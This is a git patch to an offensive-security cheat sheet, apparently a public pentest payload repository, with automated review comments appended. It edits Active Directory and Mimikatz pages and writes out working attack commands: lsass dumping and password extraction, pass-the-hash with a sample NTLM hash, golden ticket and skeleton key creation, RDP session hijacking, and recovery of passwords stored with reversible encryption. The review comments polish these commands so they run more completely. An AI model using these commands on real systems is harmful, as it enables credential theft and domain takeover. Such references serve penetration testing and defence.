From 5966c3a21b7023c42bc1b894c1162d2fb2424d56 Mon Sep 17 00:00:00 2001 From: Swissky <12152583+swisskyrepo@users.noreply.github.com> Date: Fri, 11 Nov 2022 14:52:56 +0100 Subject: [PATCH] NTDS Reversible Encryption --- Insecure Deserialization/DotNET.md | 1 + .../Active Directory Attack.md | 56 ++++++++----- .../Windows - Mimikatz.md | 78 ++++++++++--------- 3 files changed, 82 insertions(+), 53 deletions(-) diff --git a/Insecure Deserialization/DotNET.md b/Insecure Deserialization/DotNET.md index 0fef027..d5f014b 100644 --- a/Insecure Deserialization/DotNET.md +++ b/Insecure Deserialization/DotNET.md @@ -83,6 +83,7 @@ $ ./ysoserial.exe -f BinaryFormatter -g PSObject -o base64 -c "calc" -t ### JSON.NET +* In C# source code, look for `JsonConvert.DeserializeObject(json, new JsonSerializerSettings`. * Payload output: **JSON** ```ps1 diff --git a/Methodology and Resources/Active Directory Attack.md b/Methodology and Resources/Active Directory Attack.md index b0360d8..c8d6f66 100644 --- a/Methodology and Resources/Active Directory Attack.md +++ b/Methodology and Resources/Active Directory Attack.md @@ -40,6 +40,7 @@ - [Using Mimikatz DCSync](#using-mimikatz-dcsync) - [Using Mimikatz sekurlsa](#using-mimikatz-sekurlsa) - [Crack NTLM hashes with hashcat](#crack-ntlm-hashes-with-hashcat) + - [NTDS Reversible Encryption](#ntds-reversible-encryption) - [User Hunting](#user-hunting) - [Password spraying](#password-spraying) - [Kerberos pre-auth bruteforcing](#kerberos-pre-auth-bruteforcing) 
@@ -482,24 +483,27 @@ Replace the customqueries.json file located at `/home/username/.config/bloodhoun This exploit require to know the user SID, you can use `rpcclient` to remotely get it or `wmi` if you have an access on the machine. -```powershell -# remote -rpcclient $> lookupnames john.smith -john.smith S-1-5-21-2923581646-3335815371-2872905324-1107 (User: 1) - -# loc -wmic useraccount get name,sid -Administrator S-1-5-21-3415849876-833628785-5197346142-500 -Guest S-1-5-21-3415849876-833628785-5197346142-501 -Administrator S-1-5-21-297520375-2634728305-5197346142-500 -Guest S-1-5-21-297520375-2634728305-5197346142-501 -krbtgt S-1-5-21-297520375-2634728305-5197346142-502 -lambda S-1-5-21-297520375-2634728305-5197346142-1110 - -# powerview -Convert-NameToSid high-sec-corp.localkrbtgt -S-1-5-21-2941561648-383941485-1389968811-502 -``` +* RPCClient + ```powershell + rpcclient $> lookupnames john.smith + john.smith S-1-5-21-2923581646-3335815371-2872905324-1107 (User: 1) + ``` +* WMI + ```powershell + wmic useraccount get name,sid + Administrator S-1-5-21-3415849876-833628785-5197346142-500 + Guest S-1-5-21-3415849876-833628785-5197346142-501 + Administrator S-1-5-21-297520375-2634728305-5197346142-500 + Guest S-1-5-21-297520375-2634728305-5197346142-501 + krbtgt S-1-5-21-297520375-2634728305-5197346142-502 + lambda S-1-5-21-297520375-2634728305-5197346142-1110 + ``` +* Powerview + ```powershell + Convert-NameToSid high-sec-corp.localkrbtgt + S-1-5-21-2941561648-383941485-1389968811-502 + ``` +* CrackMapExec: `crackmapexec ldap DC1.lab.local -u username -p password -k --get-sid` ```bash Doc: https://github.com/gentilkiwi/kekeo/wiki/ms14068 
@@ -1329,6 +1333,22 @@ $ python2 maskgen.py hashcat.mask --targettime 3600 --optindex -q -o hashcat_1H. - [crackstation.net](https://crackstation.net) - [hashes.com](https://hashes.com/en/decrypt/hash) + +#### NTDS Reversible Encryption + +`UF_ENCRYPTED_TEXT_PASSWORD_ALLOWED` ([0x00000080](http://www.selfadsi.org/ads-attributes/user-userAccountControl.htm)), if this bit is set, the password for this user stored encrypted in the directory - but in a reversible form. + +The key used to both encrypt and decrypt is the SYSKEY, which is stored in the registry and can be extracted by a domain admin. +This means the hashes can be trivially reversed to the cleartext values, hence the term “reversible encryption”. + +* List users with "Store passwords using reversible encryption" enabled + ```powershell + Get-ADUser -Filter 'userAccountControl -band 128' -Properties userAccountControl + ``` + +The password retrieval is already handled by [SecureAuthCorp/secretsdump.py](https://github.com/SecureAuthCorp/impacket/blob/master/examples/secretsdump.py) and mimikatz, it will be displayed as CLEARTEXT. + + ### User Hunting Sometimes you need to find a machine where a specific user is logged in. diff --git a/Methodology and Resources/Windows - Mimikatz.md b/Methodology and Resources/Windows - Mimikatz.md index 049a66e..403a2d2 100644 --- a/Methodology and Resources/Windows - Mimikatz.md +++ b/Methodology and Resources/Windows - Mimikatz.md 
@@ -2,25 +2,25 @@ ## Summary -* [Mimikatz - Execute commands](#mimikatz---execute-commands) -* [Mimikatz - Extract passwords](#mimikatz---extract-passwords) -* [Mimikatz - LSA Protection Workaround](#mimikatz---lsa-protection-workaround) -* [Mimikatz - Mini Dump](#mimikatz---mini-dump) -* [Mimikatz - Pass The Hash](#mimikatz---pass-the-hash) -* [Mimikatz - Golden ticket](#mimikatz---golden-ticket) -* [Mimikatz - Skeleton key](#mimikatz---skeleton-key) -* [Mimikatz - RDP session takeover](#mimikatz---rdp-session-takeover) -* [Mimikatz - Credential Manager & DPAPI](#mimikatz---credential-manager--dpapi) +* [Execute commands](#execute-commands) +* [Extract passwords](#extract-passwords) +* [LSA Protection Workaround](#lsa-protection-workaround) +* [Mini Dump](#mini-dump) +* [Pass The Hash](#pass-the-hash) +* [Golden ticket](#golden-ticket) +* [Skeleton key](#skeleton-key) +* [RDP session takeover](#rdp-session-takeover) +* [Credential Manager & DPAPI](#credential-manager--dpapi) * [Chrome Cookies & Credential](#chrome-cookies--credential) * [Task Scheduled credentials](#task-scheduled-credentials) * [Vault](#vault) -* [Mimikatz - Commands list](#mimikatz---commands-list) -* [Mimikatz - Powershell version](#mimikatz---powershell-version) +* [Commands list](#commands-list) +* [Powershell version](#powershell-version) * [References](#references) ![Data in memory](http://adsecurity.org/wp-content/uploads/2014/11/Delpy-CredentialDataChart.png) -## Mimikatz - Execute commands +## Execute commands Only one command @@ -38,7 +38,7 @@ mimikatz # sekurlsa::logonpasswords mimikatz # sekurlsa::wdigest ``` -## Mimikatz - Extract passwords +## Extract passwords > Microsoft disabled lsass clear text storage since Win8.1 / 2012R2+. It was backported (KB2871997) as a reg key on Win7 / 8 / 2008R2 / 2012 but clear text is still enabled. 
@@ -63,7 +63,7 @@ reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLo * Adding requires lock * Removing requires reboot -## Mimikatz - LSA Protection Workaround +## LSA Protection Workaround - LSA as a Protected Process (RunAsPPL) ```powershell @@ -108,7 +108,7 @@ reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLo ``` -## Mimikatz - Mini Dump +## Mini Dump Dump the lsass process with `procdump` @@ -132,22 +132,22 @@ rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump $lsass_pid C:\temp\lsass. ``` +Use the minidump: +* Mimikatz: `.\mimikatz.exe "sekurlsa::minidump lsass.dmp"` + ```powershell + mimikatz # sekurlsa::minidump lsass.dmp + mimikatz # sekurlsa::logonPasswords + ``` +* Pypykatz: `pypykatz lsa minidump lsass.dmp` -Then load it inside Mimikatz. -```powershell -mimikatz # sekurlsa::minidump lsass.dmp -Switch to minidump -mimikatz # sekurlsa::logonPasswords -``` - -## Mimikatz - Pass The Hash +## Pass The Hash ```powershell mimikatz # sekurlsa::pth /user:SCCM$ /domain:IDENTITY /ntlm:e722dfcd077a2b0bbe154a1b42872f4e /run:powershell ``` -## Mimikatz - Golden ticket +## Golden ticket ```powershell .\mimikatz kerberos::golden /admin:ADMINACCOUNTNAME /domain:DOMAINFQDN /id:ACCOUNTRID /sid:DOMAINSID /krbtgt:KRBTGTPASSWORDHASH /ptt @@ -157,7 +157,7 @@ mimikatz # sekurlsa::pth /user:SCCM$ /domain:IDENTITY /ntlm:e722dfcd077a2b0bbe15 .\mimikatz "kerberos::golden /admin:DarthVader /domain:rd.lab.adsecurity.org /id:9999 /sid:S-1-5-21-135380161-102191138-581311202 /krbtgt:13026055d01f235d67634e109da03321 /startoffset:0 /endin:600 /renewmax:10080 /ptt" exit ``` -## Mimikatz - Skeleton key +## Skeleton key ```powershell privilege::debug 
@@ -168,17 +168,25 @@ net use p: \\WIN-PTELU2U07KG\admin$ /user:john mimikatz rdesktop 10.0.0.2:3389 -u test -p mimikatz -d pentestlab ``` -## Mimikatz - RDP session takeover +## RDP session takeover Use `ts::multirdp` to patch the RDP service to allow more than two users. -Run tscon.exe as the SYSTEM user, you can connect to any session without a password. +* Enable privileges + ```powershell + privilege::debug + token::elevate + ``` +* List RDP sessions + ```powershell + ts::sessions + ``` +* Hijack session + ```powershell + ts::remote /id:2 + ``` -```powershell -privilege::debug -token::elevate -ts::remote /id:2 -``` +Run `tscon.exe` as the SYSTEM user, you can connect to any session without a password. ```powershell # get the Session ID you want to hijack @@ -188,7 +196,7 @@ net start sesshijack ``` -## Mimikatz - Credential Manager & DPAPI +## Credential Manager & DPAPI ```powershell # check the folder to find credentials @@ -235,7 +243,7 @@ Attributes : 0 vault::cred /in:C:\Users\demo\AppData\Local\Microsoft\Vault\" ``` -## Mimikatz - Commands list +## Commands list | Command |Definition| |:----------------:|:---------------| @@ -262,7 +270,7 @@ vault::cred /in:C:\Users\demo\AppData\Local\Microsoft\Vault\" |TOKEN::Elevate | impersonate a token. Used to elevate permissions to SYSTEM (default) or find a domain admin token on the box| |TOKEN::Elevate /domainadmin | impersonate a token with Domain Admin credentials. -## Mimikatz - Powershell version +## Powershell version Mimikatz in memory (no binary on disk) with :
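Review bot: the search string in the new JSON.NET bullet, `JsonConvert.DeserializeObject(json, new JsonSerializerSettings`, is a code fragment cut off mid-call (no closing parenthesis), so a reader may take it for a complete expression. State that it is a prefix to grep for, e.g. "look for calls of the form `JsonConvert.DeserializeObject(..., new JsonSerializerSettings { ... })` and inspect the settings object passed in", so that the review point (the settings passed to the deserializer are what need checking) comes through.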
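Review bot: the RPCClient fence in the SID hunk is tagged `powershell`, but `rpcclient $> lookupnames john.smith` is typed into a Linux shell; the file already uses a ```bash fence two lines further down, so use that tag here. In the Powerview block the domain and account have run together (`Convert-NameToSid high-sec-corp.localkrbtgt`), which looks like a backslash swallowed by Markdown; escape it or re-check the command. Minor: the unchanged intro line "This exploit require to know the user SID" should read "This exploit requires knowing the user's SID".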
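Review bot: the new NTDS section first says the password is "stored encrypted ... in a reversible form" and then says "the hashes can be trivially reversed"; what is decrypted is the stored password, not a hash, so write "the stored passwords can be trivially decrypted". Grammar in the same hunk: "the password for this user stored encrypted" needs "is stored", and "secretsdump.py and mimikatz, it will be displayed as CLEARTEXT" is a comma splice (e.g. "both print it as CLEARTEXT"). The `Get-ADUser -Filter 'userAccountControl -band 128'` query is the right audit check and the 128 matches the linked 0x00000080; appending `| Select-Object SamAccountName, userAccountControl` would make the output show directly which accounts carry the flag.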
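Review bot: dropping the `Mimikatz - ` prefix in the Summary hunk changes every anchor in this file (`#mimikatz---execute-commands` becomes `#execute-commands`, and so on down to `#powershell-version`). Any link elsewhere in the repository, or bookmarked externally, that points at the old anchors will now land at the top of the page, so grep the other Markdown files for `mimikatz---` before merging, or keep the old names reachable as HTML anchors next to the renamed headings.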
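Review bot: in the "Use the minidump" bullet the inline form `.\mimikatz.exe "sekurlsa::minidump lsass.dmp"` only switches mimikatz to the dump and then drops to the interactive prompt; it never runs `sekurlsa::logonPasswords`, which the fenced block directly beneath it does. Either drop the inline form or make it complete, following the pattern the golden-ticket section in this same hunk already uses (`.\mimikatz "kerberos::golden ..." exit`), i.e. pass both commands followed by `exit`. The pypykatz bullet (`pypykatz lsa minidump lsass.dmp`) is self-contained as written.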
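Review bot: the "Hijack session" bullet hardcodes `ts::remote /id:2` without saying where the id comes from; tie it to the preceding bullet ("use the ID shown by `ts::sessions`"). The sentence moved below the list, "Run `tscon.exe` as the SYSTEM user, you can connect to any session without a password", is a comma splice and now sits between the mimikatz steps and the tscon block it introduces; rewrite it as "Alternatively, run `tscon.exe` as SYSTEM: it connects to any session without a password" so the reader sees it is a second method rather than a continuation of the mimikatz steps.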